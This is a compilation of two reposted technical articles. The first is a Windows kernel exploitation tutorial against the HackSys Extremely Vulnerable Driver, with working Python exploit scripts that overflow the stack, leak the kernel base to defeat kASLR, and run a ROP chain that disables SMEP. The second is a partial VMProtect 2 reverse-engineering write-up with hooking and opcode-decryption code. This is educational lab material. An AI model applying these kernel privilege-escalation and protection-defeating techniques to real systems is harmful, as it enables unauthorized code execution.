HEVD: kASLR + SMEP Bypass

HEVD: kASLR + SMEP Bypass

Original text by Andres Roldan

During the last posts, we’ve been dealing with exploitation in Windows Kernel space. We are using HackSys Extremely Vulnerable Driver or HEVD as the target which is composed of several vulnerabilities to let practitioners sharpen the Windows Kernel exploitation skills.

In the last post, we successfully created a DoS exploit leveraging a stack overflow vulnerability in HEVD. The DoS ocurred because we placed an arbitrary value on EIP (41414141) and when the OS tried to access that memory address, it was not accessible.

In this article, we will use that ability to overwrite EIP to execute code in privileged mode.

During the exploitation process, we will come across with Supervisor Mode Execution Prevention or SMEP which will thwart our exploit. But fear not: we will be able to bypass it.

Local vs Remote exploitation

When we were exploiting Vulnserver, we were doing remote exploitation to a user-space application. That kind of environment has certain specific restrictions, the most notorious are limited buffer space to insert our payload, character restrictions and ASLR (Address Space Layout Randomization).

When we are exploiting the Windows Kernel, it is assumed that we already have unprivileged local access to the target machine. In that environment, those restrictions are not longer a major issue. For example, the buffer space problem and character restrictions are easily circumvented by allocating dynamic memory with VirtualAlloc(), moving the raw payload to that buffer and overwriting EIP with the returned pointer.

ASLR and kASLR (Kernel ASLR) is not an issue either, because it works by randomizing the base memory of the modules at every restart, but if we have local access, there are functions in the Windows API that will reveal the current kernel base address.

However, other protections come to scene when trying to exploit at kernel level, like DEPSMEPCFG, etc. We will surely come across with some of them later. Stay tuned.

Stack Overflow exploitation

We left off our previous article performing a DoS to the target machine, on where we used the following exploit:

#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

from infi.wioctl import DeviceIoControl

DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'

IOCTL_HEVD_STACK_OVERFLOW = 0x222003
SIZE = 3000

PAYLOAD = (
    b'A' * SIZE
)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

And we were able to overwrite EIP with the value 41414141. If we are going to perform something more interesting, we must start by locating the exact offset on which EIP is overwritten. Just like on any other user-space exploitation process, we can create a cyclic pattern to find that offset. We can use mona to do that:

Mona Cyclic Pattern

Then, update our exploit:

#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

from infi.wioctl import DeviceIoControl

DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'

IOCTL_HEVD_STACK_OVERFLOW = 0x222003

PAYLOAD = (
    b'<insert pattern here>'
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

And check it:

Mona Cyclic Pattern

Good, mona discovered that EIP gets overwritten starting at byte 2080.

Now, for illustration purposes, we’ll create a simple shellcode to make EAX = 0xdeadbeef. Then, we must copy it in a dynamic generated location created by VirtualAlloc(). The return value of VirtualAlloc() is a pointer that will be placed starting at byte 2081 of our buffer to divert the execution flow to our shellcode.

Let’s update our exploit with that:

#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

import struct
from ctypes import windll, c_int
from infi.wioctl import DeviceIoControl

KERNEL32 = windll.kernel32
DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'
IOCTL_HEVD_STACK_OVERFLOW = 0x222003

SHELLCODE = (
    b'\xb8\xef\xbe\xad\xde' +     # mov eax,0xdeadbeef
    b'\xcc'                       # INT3 -> software breakpoint
)

RET_PTR = KERNEL32.VirtualAlloc(
    c_int(0),                    # lpAddress
    c_int(len(SHELLCODE)),       # dwSize
    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE
    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE
)

KERNEL32.RtlMoveMemory(
    c_int(RET_PTR),              # Destination
    SHELLCODE,                   # Source
    c_int(len(SHELLCODE))        # Length
)

PAYLOAD = (
    b'A' * 2080 +
    struct.pack('<L', RET_PTR)
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

If everything comes as expected, EAX will have the value 0xdeadbeef and execution will pause at the inserted breakpoint \xcc. Let’s check it:

SMEP in action

Ouch!

Our exploit was thwarted and the error ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY was triggered when the first instruction of our shellcode was trying to execute. That means that SMEP did protect the kernel.

SMEP: Supervisor Mode Execution Prevention

There’s a concept called Protection rings which is used by operating systems to delimit capabilities and provide fault tolerance, by defining levels of privileges. Windows OS versions uses only 2 Current Privilege Levels (CPL): 0 and 3. CPL levels are also referred as ringsCPL0 or ring-0 is where the kernel is executed and CPL3 or ring-3 is where user mode instructions are performed.

SMEP is a protection introduced at CPU-level which prevents the kernel to execute code belonging to ring-3.

The ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY exception was triggered because HEVD is executing at ring-0 and after overwriting EIP, it was trying to run the instructions in our shellcode which was allocated at ring-3.

Technically, SMEP is nothing but a bit in a CPU control register, specifically the 20th bit of the CR4 control register:

CR4 register

To bypass SMEP, we must flip that bit (make it 0). As can be seen, the current value of CR4 with SMEP enabled is 001406e9. Let’s check what would be the value after flipping the 20th bit:

CR4 register

It would be 000406e9. We need to place that value on CR4 to turn off SMEP.

But, how can we do that if we are not allowed to execute instructions at ring-3ROP comes to the rescue! We need to execute a ROP chain with instructions that are already in kernel mode. At ring-0 ROP is often referred as kROP. We then need to execute a kROP chain and change the value of CR4. With that, we should be able to make EAX = 0xdeadbeef.

In nt!KeFlushCurrentTb, we find a gadget that sets CR4 from whatever value EAX may have: mov cr4, eax # ret

CR4 ROP

Now, we need to calculate the offset of that ROP gadget from the start of the nt module:

CR4 ROP Offset

The offset is 0011f8de. We’ll use that later.

Now we need to find a pop eax # ret gadget. We can find one at nt!_MapCMDevicePropertyToNtProperty+0x39:

POP EAX ROP

And the offset from the start of the nt module is 0002bbef:

POP EAX Offset

We must remember to pad our ROP chain with 8 bytes because the overflowed function epilog uses ret 8 which will return to the value pointed by ESP and then will pop 8 bytes from the stack:

ROP Padding

With that, we can now disable SMEP!

Defeating kASLR

We’ve got all the required information to create the ROP chain to disable SMEP. However, we need to deal with kernel ASLR. As I mentioned before, there are several functions that can be executed in user mode (ring-3) that can give information of addresses at ring-0. The most used are NtQuerySystemInformation() and EnumDeviceDrivers(). The later is the simpler. With the following code, you can get the kernel base address:

import sys
from ctypes import windll, c_ulong, byref, sizeof

PSAPI = windll.psapi

def get_kernel_base():
    """Obtain kernel base address."""
    buff_size = 0x4

    base = (c_ulong * buff_size)(0)

    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):
        print('Failed to get kernel base address.')
        sys.exit(1)
    return base[0]

BASE_ADDRESS = get_kernel_base()
print(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')

And check it:

Kernel Base Address

As you can see, it matches perfectly to the address reported by WinDBG:

Kernel Base Address

With that, we can update our exploit, adding the ROP chain to disable SMEP, using the offsets of the gadgets and the value returned from that function to obtain absolute addresses, defeating kASLR!

#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

import struct
import sys
from ctypes import windll, c_int, c_ulong, byref, sizeof
from infi.wioctl import DeviceIoControl

KERNEL32 = windll.kernel32
PSAPI = windll.psapi
DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'
IOCTL_HEVD_STACK_OVERFLOW = 0x222003


def get_kernel_base():
    """Obtain kernel base address."""
    buff_size = 0x4

    base = (c_ulong * buff_size)(0)

    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):
        print('Failed to get kernel base address.')
        sys.exit(1)
    return base[0]


BASE_ADDRESS = get_kernel_base()
print(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')

SHELLCODE = (
    b'\xb8\xef\xbe\xad\xde' +     # mov eax,0xdeadbeef
    b'\xcc'                       # INT3 -> software breakpoint
)

RET_PTR = KERNEL32.VirtualAlloc(
    c_int(0),                    # lpAddress
    c_int(len(SHELLCODE)),       # dwSize
    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE
    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE
)

KERNEL32.RtlMoveMemory(
    c_int(RET_PTR),              # Destination
    SHELLCODE,                   # Source
    c_int(len(SHELLCODE))        # Length
)

ROP_CHAIN = (
    struct.pack('<L', BASE_ADDRESS + 0x0002bbef) +     #  pop eax # ret
    struct.pack('<L', 0x42424242) +                    #  Padding for ret 8
    struct.pack('<L', 0x42424242) +                    #
    struct.pack('<L', 0x000406e9) +                    #  Value to disable SMEP
    struct.pack('<L', BASE_ADDRESS + 0x0011f8de) +     #  mov cr4, eax # ret
    struct.pack('<L', RET_PTR)                         #  Pointer to shellcode
)

PAYLOAD = (
    b'A' * 2080 +
    ROP_CHAIN
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

Looks good. Now check it:

Success

And this is the content of the CR4 register:

Success

As you can see, we were able to disable SMEP and made EAX = 0xdeadbeef!

Conclusions

In this post we were able to execute a shellcode which made EAX = 0xdeadbeef. We also bypassed SMEP protection using a kROP chain and defeated kASLR by leaking the kernel base address from ring-3. However, we have still have to get a privileged shell on this system, which will be covered in the next article.

VMProtect 2 — Part Two, Complete Static Analysis

VMProtect 2 - Part Two, Complete Static Analysis

Original text by _xeroxz

VMProtect 2 Project’s Group: githacks.org/vmp2

Table Of Contents


Purpose


The purpose of this article is to expound upon the prior work disclosed in the last article titled “VMProtect 2 — Detailed Analysis of the Virtual Machine Architecture”, as well as correct a few mistakes. In addition, this post will focus primarily on the creation of static analysis tools using the knowledge disclosed in the prior post, and providing some detailed, albut unofficial, VTIL documentation. This article will also showcase all projects on githacks.org/vmp2, however, these projects are subject to change.

Intentions


My intentions behind this research is to further my knowledge in the subject of software protection via native code virtualization, and code obfuscation, it is not to profit nor slander the name of VMProtect. Rather, the creator(s) of said software are to be respected as their work is clearly impressive and has arguably stood the test of time.

Definitions


Code Block: A virtual instruction block, or code block, is a sequence of virtual instructions which are contained between virtual branching instructions. An example of this would be any instructions following a JMP instruction and the next JMP or VMEXIT instruction. A code block is represented in C++ as a structure (vm::instrs::code_block_t) containing a vector of virtual instructions, along with the beginning address of the code block contained in the structure itself. Other metadata about a given code block is also contained inside of this structure such as if the code block branches to two other code blocks, branches to only one code block, or exits the virtual machine.

VMProtect 2 IL: Intermediate level of representation, or language. Consider the encoded and encrypted virtual instructions to be the usable, native form of virtual instructions. Then IL would be a higher level representation, typically IL representation refers to a representation of code used by compilers and assemblers. An example of VMProtect 2 IL is what VMAssembler does lexical analysis on, or a file containing the IL to be more specific.

VMProtect 2 — Project’s Overview


Note: you can find the doxygen for VMProfiler here

Although there may seem to be quite a handful of projects located at githacks.org/vmp2, there is really only a single large library project and smaller projects which inherit this library. VMProfiler is the base library for VMProfiler QtVMProfiler CLIVMEmu, and VMAssembler. Each of these projects are static analysis based and thus VMHook and um-hook do not inherit VMProfiler.

VMHook — Overview


VMHook is a very small C++ framework for hooking into VMProtect 2 virtual machines, um-hook inherits this framework and provides a demonstration of how to use the framework. VMHook is not used to uncover virtual instructions and their functionality, rather to alter them.

VMHook — Example, um-hook


.data
	__mbase dq 0h
	public __mbase

.code
__lconstbzx proc
	mov al, [rsi]
	lea rsi, [rsi+1]
	xor al, bl
	dec al
	ror al, 1
	neg al
	xor bl, al

	pushfq			; save flags...
	cmp ax, 01Ch
	je swap_val

					; the constant is not 0x1C
	popfq			; restore flags...	 
	sub rbp, 2
	mov [rbp], ax
	mov rax, __mbase
	add rax, 059FEh	; calc jmp rva is 0x59FE...
	jmp rax

swap_val:			; the constant is 0x1C
	popfq			; restore flags...
	mov ax, 5		; bit 5 is VMX in ECX after CPUID...
	sub rbp, 2
	mov [rbp], ax
	mov rax, __mbase
	add rax, 059FEh	; calc jmp rva is 0x59FE...
	jmp rax
__lconstbzx endp
end

um-hook is a project which inherits VMHook, it demonstrates hooking the LCONSTBZX virtual instruction and spoofing its immediate value. This subsequently affects the later virtual shift functions result, which ultimately results in the virtual routine returning true instead of false.

VMProfiler — Overview


VMProfiler is a C++ library which is used for static analysis of VMProtect 2 binaries. This is the base project for VMProfiler QtVMProfiler CLIVMEmu, and VMAssemblerVMProfiler also inherits VTIL and contains virtual machine handler profiles and lifters.

VMProfiler — Virtual Machine Handler Profiling


Virtual machine handlers are found and categorized via a pattern matching algorithm. The first iteration of this algorithm simply compared the native instructions bytes. However this has proven to be ineffective as changes to the native instruction which don’t result in a different outcome but do change the native instructions bytes will cause the algorithm to miscatagorize or even fail to recongnize virtual machine handlers. Consider the following instruction variants, all of which when executed have the same result but each has their own unique sequence of bytes.

0:  36 48 8b 00             mov    rax,QWORD PTR ss:[rax]
4:  48 8b 00                mov    rax,QWORD PTR [rax] 
0:  36 48 8b 04 05 00 00    mov    rax,QWORD PTR ss:[rax*1+0x0]
7:  00 00 

In order to handle such cases, a new iteration of the profiling algorithm has been designed and implemented. This new rendition still pattern matches, however for each instruction of a virtual machine handler a lambda is defined. This lambda takes in a ZydisDecodedInstruction parameter, by reference, and returns a boolean. The result being true if a given decoded instruction meets all of the comparison cases. The usage of zydis for this purpose allows for one to compare operands at a much finer level. For example, operand two from both instructions in the figure above is of type ZYDIS_OPERAND_TYPE_MEMORY. In addition, the base of this memory operand for both instructions is RAX. The mnemonic of both instructions is the same. This sort of minimalist comparison thinking is what this rendition of the profiling algorithm is based off of.

vm::handler::profile_t readq = {
    // MOV RAX, [RAX]
    // MOV [RBP], RAX
    "READQ",
    READQ,
    NULL,
    { { // MOV RAX, [RAX]
        []( const zydis_decoded_instr_t &instr ) -> bool {
            return instr.mnemonic == ZYDIS_MNEMONIC_MOV &&
                   instr.operands[ 0 ].type == ZYDIS_OPERAND_TYPE_REGISTER &&
                   instr.operands[ 0 ].reg.value == ZYDIS_REGISTER_RAX &&
                   instr.operands[ 1 ].type == ZYDIS_OPERAND_TYPE_MEMORY &&
                   instr.operands[ 1 ].mem.base == ZYDIS_REGISTER_RAX;
        },
        // MOV [RBP], RAX
        []( const zydis_decoded_instr_t &instr ) -> bool {
            return instr.mnemonic == ZYDIS_MNEMONIC_MOV && 
            	   instr.operands[ 0 ].type == ZYDIS_OPERAND_TYPE_MEMORY &&
                   instr.operands[ 0 ].mem.base == ZYDIS_REGISTER_RBP &&
                   instr.operands[ 1 ].type == ZYDIS_OPERAND_TYPE_REGISTER &&
                   instr.operands[ 1 ].reg.value == ZYDIS_REGISTER_RAX;
        } } } };

In the figure above, the READQ profile is displayed. Notice that not every single instruction for a virtual machine handler must have a zydis lambda for it. Only enough for a unique profile to be constructed for it. There are in fact additional native instructions for READQ which are not accounted for with zydis comparison lambdas.

VMProfiler — Virtual Branch Detection Algorithm


The most glaring consistency in a virtual branch is the usage of PUSHVSP. This virtual instruction is executed when two encrypted values are on the stack at VSP + 0, and VSP + 8. These encrypted values are decrypted using the last LCONSTDW value of a given block. Thus a trivially small algorithm can be created based upon these two consistencies. The first part of the algorithm will simply use std::find_if with reverse iterators to locate the last LCONSTDW in a given code block. This DWORD value will be interpreted as the XOR key used to decrypt the encrypted relative virtual addresses of both branches. A second std::find_if is now executed to locate a PUSHVSP virtual instruction that when executed, two encrypted relative virtual addresses will be located on the stack. The algorithm will interpret the top two stack values of every PUSHVSP instruction as encrypted relative virtual addresses and apply an XOR operation with the last LCONSTDW value.

std::optional< jcc_data > get_jcc_data( vm::ctx_t &vmctx, code_block_t &code_block )
{
    // there is no branch for this as this is a vmexit...
    if ( code_block.vinstrs.back().mnemonic_t == vm::handler::VMEXIT )
        return {};

    // find the last LCONSTDW... the imm value is the JMP xor decrypt key...
    // we loop backwards here (using rbegin and rend)...
    auto result = std::find_if( code_block.vinstrs.rbegin(), code_block.vinstrs.rend(),
                                []( const vm::instrs::virt_instr_t &vinstr ) -> bool {
                                    auto profile = vm::handler::get_profile( vinstr.mnemonic_t );
                                    return profile && profile->mnemonic == vm::handler::LCONSTDW;
                                } );

    jcc_data jcc;
    const auto xor_key = static_cast< std::uint32_t >( result->operand.imm.u );
    const auto &last_trace = code_block.vinstrs.back().trace_data;

    // since result is already a variable and is a reverse itr
    // i'm going to be using rbegin and rend here again...
    //
    // look for PUSHVSP virtual instructions with two encrypted virtual
    // instruction rva's ontop of the virtual stack...
    result = std::find_if(
        code_block.vinstrs.rbegin(), code_block.vinstrs.rend(),
        [ & ]( const vm::instrs::virt_instr_t &vinstr ) -> bool {
            if ( auto profile = vm::handler::get_profile( vinstr.mnemonic_t );
                 profile && profile->mnemonic == vm::handler::PUSHVSP )
            {
                const auto possible_block_1 = code_block_addr( vmctx, 
                		vinstr.trace_data.vsp.qword[ 0 ] ^ xor_key ),
                           possible_block_2 = code_block_addr( vmctx, 
                        vinstr.trace_data.vsp.qword[ 1 ] ^ xor_key );

                // if this returns too many false positives we might have to get
                // our hands dirty and look into trying to emulate each branch
                // to see if the first instruction is an SREGQ...
                return possible_block_1 > vmctx.module_base &&
                       possible_block_1 < vmctx.module_base + vmctx.image_size &&
                       possible_block_2 > vmctx.module_base &&
                       possible_block_2 < vmctx.module_base + vmctx.image_size;
            }
            return false;
        } );

    // if there are not two branches...
    if ( result == code_block.vinstrs.rend() )
    {
        jcc.block_addr[ 0 ] = code_block_addr( vmctx, last_trace );
        jcc.has_jcc = false;
        jcc.type = jcc_type::absolute;
    }
    // else there are two branches...
    else
    {
        jcc.block_addr[ 0 ] = code_block_addr( vmctx, 
        	result->trace_data.vsp.qword[ 0 ] ^ xor_key );
        jcc.block_addr[ 1 ] = code_block_addr( vmctx, 
        	result->trace_data.vsp.qword[ 1 ] ^ xor_key );

        jcc.has_jcc = true;
        jcc.type = jcc_type::branching;
    }

    return jcc;
}

Note: the underlying flag in which the virtual branch is dependent on is not extracted using this algorithm. This is one of the negative aspects of this algorithm as it stands.

VMProfiler Qt — Overview


VMProfiler Qt is a small C++ Qt based GUI that allows for inspection of virtual instruction traces. These traces are generated via VMEmu and contain all information for every virtual instruction. The GUI contains a window for virtual register values, native register values, the virtual stack, virtual instructions, expandable virtual branches, and lastly a tab containing all virtual machine handlers and their native instructions, and transformations.

VMProfiler CLI — Overview


VMProfiler CLI is a command line project which is used to demonstrate all VMProfiler features. This project only consists of a single file (main.cpp), however it’s a good reference for those who are interested in inheriting VMProfiler as their code base.

Usage: vmprofiler-cli [options...]
Options:
    --bin, --vmpbin        unpacked binary protected with VMProtect 2
    --vmentry, --entry     rva to push prior to a vm_entry
    --showhandlers         show all vm handlers...
    --showhandler          show a specific vm handler given its index...
    --vmp2file             path to .vmp2 file...
    --showblockinstrs      show the virtual instructions of a specific code block...
    --showallblocks        shows all information for all code blocks...
    --devirt               lift to VTIL IR and apply optimizations, then display the output...
    -h, --help             Shows this page

VMEmu — Overview


VMEmu is a unicorn-engine based project which emulates virtual machine handlers to subsequently decrypt virtual instruction operands. VMEmu inherits VMProfiler which aids in determining if a given code block has a virtual JCC in it. VMEmu does not currently support dumped modules as “dumped modules” can take many forms. There is not one standard file format for a dumped module so support for dumped modules will come with another unicorn-engine based project to produce a standard dump format.

Usage: vmemu [options...]
Options:
    --vmentry              relative virtual address to a vm entry... (Required)
    --vmpbin               path to unpacked virtualized binary... (Required)
    --out                  output file name for trace file... (Required)
    -h, --help             Shows this page

VMEmu — Unicorn Engine, Static Decryption Of Opcodes


In order to statically decrypt virtual instruction operands, one must first understand how these operands are encrypted in the first place. The algorithm VMProtect 2 uses to encrypt virtual instruction operands can be represented as a mathematical formula.\text{Let } F_n \text{ be an encryption function and } T_{m,F_n} \text{denote the } m\text{th transformation of function } F_n:Let Fn​ be an encryption function and Tm,Fn​​denote the mth transformation of function Fn​:F_0(e, o) = T_{4, F_0} \circ T_{3, F_0}\circ T_{2, F_0} \circ T_{1, F_0} \circ T_{0, F_0}(e, o)F0​(e,o)=T4,F0​​∘T3,F0​​∘T2,F0​​∘T1,F0​​∘T0,F0​​(e,o)G_0(e, o) = T_{1, F_0}(F_0(e, o), e)G0​(e,o)=T1,F0​​(F0​(e,o),e)\text{Thus:}Thus:\text{key}_{n+1} = G_n(\text{key}_n, \text{operand}_n)keyn+1​=Gn​(keyn​,operandn​)\text{operand}_{n+1} = F_n(\text{key}_n, \text{operand}_n)operandn+1​=Fn​(keyn​,operandn​)\text{Furthermore:}Furthermore:T_{m, F_n} \text{ maps to a given vm::transformation::type such that } T_{0, F_n} = \text {vm::transform::type::generic\textunderscore0},Tm,Fn​​ maps to a given vm::transformation::type such that T0,Fn​​=vm::transform::type::generic_0,T_{1, F_n} = \text{ vm::transform::type::rolling\textunderscore key }, …, T_{6, F_n} = \text{ vm::transform::type::update\textunderscore key }T1,Fn​​= vm::transform::type::rolling_key ,…,T6,Fn​​= vm::transform::type::update_key 

Considering the above figure, decryption of operands is merely the inverse of function FF. This inverse is generated into native x86_64 instructions and embedded into each virtual machine handler as well as calc_jmp. One could simply emulate these instructions via reimplementation of them in C/C++, however my implementation of such instructions is merely for the purpose of encryption, not decryption. Instead, the usage of unicorn-engine is preferred in this situation as by simply emulating these virtual machine handlers, decrypted operands will be produced.

Understand that no runtime value can possibly affect the decryption of operands, thus invalid memory accesses can be ignored. However, runtime values can alter which virtual instruction blocks are decrypted, thus the need for saving the context of the emulated CPU prior to execution of a branching virtual instruction. This will allow for restoring the state of the emulated CPU prior to the branching instruction, but additionally altering which branch the emulated CPU will take, allowing for complete decryption of all virtual instruction blocks statically.

To reiterate, the usage of unicorn-engine is for computing F(e, o)F(e,o) and G(e, o)G(e,o) where ee takes the form of the native register RBXRBX, oo takes the form of the native register RAXRAX, and T_{m, F_n}Tm,Fn​​ takes the form of transformation mmth.

In addition, not only can decrypted operands be obtained using unicorn-engine, but views of the virtual stack can be snapshotted for every single virtual instruction. This allows for algorithms to take advantage of values that are on the stack. Calls to native WinAPI’s are done outside of the virtual machine, except for rare cases such as the VMProtect 2 packer virtual machine handler which calls LoadLibrary with a pointer to the string “NTDLL.DLL” in RCX.

VMEmu — Virtual Branching


Seeing all code paths is extremely important. Consider the most basic situation where a parameter is checked to see if it’s a nullptr.

auto demo(int* a)
{
    if (!a)
        return {};

    // more code down here
}

Analysis of the above code without being able to see all code paths would result in something useless. Thus seeing all branches inside of the virtual machine was the top priority. In this section I will detail how virtual branching works inside of the VMProtect 2 virtual machine, as well as the algorithms I’ve designed to recognize and analyze all paths.

To begin, not all code blocks end with a branching virtual instruction. Some end with virtual machine exit’s, or absolute jumps. Thus the need for an algorithm which can determine if a given virtual instruction block will branch or not. In order to produce such an algorithm, intimate knowledge of the virtual machine branching mechanism is required, specifically how native JCC’s are translated to virtual instructions.

Consider the possible affected flag bits of the native ADD instruction. Flags OFSFZFAFCF, and PF can all be affected depending on the computation. Native branching is done via JCC instructions which depend upon the state of a specific flag or flags.

test rax, rax
jz branch_1

Figure 2.

Consider figure 2, understand that the JZ native instruction will jump to “branch_1” if the ZF flag is set. One could reimplement figure 2 in such a way that only the native JMP instruction and a few other math and stack operations could be used. Reducing the number of branching instructions to a single native JMP instruction.

Consider that the native TEST instruction performs a bitwise AND on both operands, sets flags accordingly, and disregards the AND result. One could simply replace the native TEST instruction with a few stack operations and the native AND instruction.

0:  50                      push   rax
1:  48 21 c0                and    rax,rax
4:  9c                      pushf
5:  48 83 24 24 40          and    QWORD PTR [rsp],0x40
a:  48 c1 2c 24 03          shr    QWORD PTR [rsp],0x3
f:  58                      pop    rax
10: ff 34 25 00 00 00 00    push   branch_1
17: ff 34 25 00 00 00 00    push   branch_2
1e: 48 8b 04 04             mov    rax,QWORD PTR [rsp+rax*1]
22: 48 83 c4 10             add    rsp,0x10
26: 48 89 44 24 f8          mov    QWORD PTR [rsp-0x8],rax
2b: 58                      pop    rax
2c: ff 64 24 f0             jmp    QWORD PTR [rsp-0x10]

Figure 3. Note: bittest/test is not used here as it is implemented via AND, and SHR.

Although it may seem that converting a single instruction into multiple may be counterproductive and requiring more work in the end, this is not the case as these instructions will be reused in other orientations. Reimplementation of all JCC instructions could be done quite simply using the above assembly code template. Even such branching instructions as the JRCXZJECXZ, and JCXZ instructions could be implemented by simply swapping RAX with RCX/EAX/CX in the above example.

Figure 3, although in native x86_64, provides a solid example of how VMProtect 2 does branching inside of the virtual machine. However, VMProtect 2 adds additional obfuscation via math obfuscation. Firstly, both addresses pushed onto the stack are encrypted relative virtual addresses. These addresses are decrypted via XOR. Although XOR, SUB, and other math operations themselves are obfuscated into NAND operations.

; push encrypted relative virtual addresses onto the stack...
LCONSTQ 0x19edc194
LCONSTQ 0x19ed8382
PUSHVSP

; calculate which branch will be executed, then read its encrypted address on the stack...
LCONSTBZXW 0x3
LCONSTBSXQ 0xbf
LREGQ 0x80
NANDQ
SREGQ 0x68
SHRQ
SREGQ 0x70
ADDQ
SREGQ 0x48
READQ

; clear the stack of encrypted addresses...
SREGQ 0x68
SREGQ 0x70
SREGQ 0x90

; put the selected branch encrypted address back onto the stack...
LREGQ 0x68
LREGQ 0x68

; xor value on top of the stack with 59f6cb36
LCONSTDW 0xa60934c9
NANDDW
SREGQ 0x48
LCONSTDW 0x59f6cb36
LREGDW 0x68
NANDDW
SREGQ 0x48
NANDDW
SREGQ 0x90
SREGQ 0x70

; removed virtual instructions...
; …

; load the decrypted relative virtual address and jmp...
LREGQ 0x70
JMP

Figure 4.

As discussed prior, VMProtect 2 uses the XOR operation to decrypt and subsequently encrypt the relative virtual addresses pushed onto the stack. Selection of a specific encrypted relative virtual address is done by shifting a given flag to result in its value being either zero or eight. Then, adding VSP to the resulting shift computes the address in which the encrypted relative virtual address is located.

#define FIRST_CONSTANT a60934c9
#define SECOND_CONSTANT 59f6cb36

unsigned int jcc_decrypt(unsigned int encrypted_rva)
{
    unsigned int result = ~encrypted_rva & ~encrypted_rva;
    result = ~result & ~FIRST_CONSTANT;
    result = ~(~encrypted_rva & ~SECOND_CONSTANT) & ~result;
    return result;
}

Figure 5. Note: Notice that FIRST_CONSTANT and SECOND_CONSTANT are inverses of each other.

VMAssembler — Overview


VMAssembler is a virtual instruction assembler project originally contemplated as a joke. Regardless of its significance to anything, it is a fun project that allows for an individual to become more acquainted with the features of VMProtect 2. VMAssembler uses LEX and YACC to parse text files for labels and virtual instruction tokens. It then encodes and encrypts these virtual instructions based upon the specific virtual machine specified via the command line. Finally a C++ header file is generated which contains the assembled virtual instructions as well as the original VMProtect’ed binary.

VMAssembler — Assembler Stages


VMAssembler uses LEX and YACC to parse text files for virtual instruction names and immediate values. There are four main stages to VMAssembler, lexical analysis and parsing, virtual instruction encoding, virtual instruction encryption, and lastly C++ code generation.

VMAssembler — Stage One, Lexical Analysis and Parsing


Lexical analysis and token parsing are two stages themselves, however I will be referring to these stages as one as the result of these is data structures manageable by C++.

The first stage of VMAssembler is almost entirely handled by LEX and YACC. Text is converted into C++ structures representing virtual instructions. These structures are referred to as _vinstr_meta and _vlable_meta. These structures are then used by stage two to validate virtual instructions existence, as well as encoding these higher level representations of virtual instructions into decrypted virtual operands.

VMAssembler — Stage Two, Virtual Instruction Encoding


Virtual instruction encoding stage of assembling also validates the existence of all virtual instructions for each virtual label. This is done by comparing profiled vm handler names with the virtual instruction name token. If a virtual instruction does not exist then assembling will cease.

if ( !parse_t::get_instance()->for_each( [ & ]( _vlabel_meta *label_data ) -> bool {
         std::printf( "> checking label %s for invalid instructions... number of instructions = %d\n",
                      label_data->label_name.c_str(), label_data->vinstrs.size() );

         const auto result = std::find_if(
             label_data->vinstrs.begin(), label_data->vinstrs.end(),
             [ & ]( const _vinstr_meta &vinstr ) -> bool {
                 std::printf( "> vinstr name = %s, has imm = %d, imm = 0x%p\n", vinstr.name.c_str(),
                              vinstr.has_imm, vinstr.imm );

                 for ( auto &vm_handler : vmctx->vm_handlers )
                     if ( vm_handler.profile && vm_handler.profile->name == vinstr.name )
                         return false;

                 std::printf( "[!] this vm protected file does not have the vm handler for: %s...\n",
                              vinstr.name.c_str() );

                 return true;
             } );

         return result == label_data->vinstrs.end();
     } ) )
{
    std::printf( "[!] binary does not have the required vm handlers...\n" );
    exit( -1 );
}

Once all virtual instruction IL is validated, encoding of these virtual instructions can commence. The order in which the virtual instruction pointer advances is important to note throughout the process of encoding and encrypting. The direction dictates the ordering of operands and virtual instructions.

VMAssembler — Stage Three, Virtual Instruction Encryption


Just like stage two of assembly, stage three must also take into consideration which way the virtual instruction pointer advances. This is because operands must be encrypted in an order based upon the direction of VIP’s advancement. The encryption key produced by the last operands encryption is used for the starting encryption key for the next as detailed in “VMEmu — Unicorn Engine, Static Decryption Of Opcodes”.

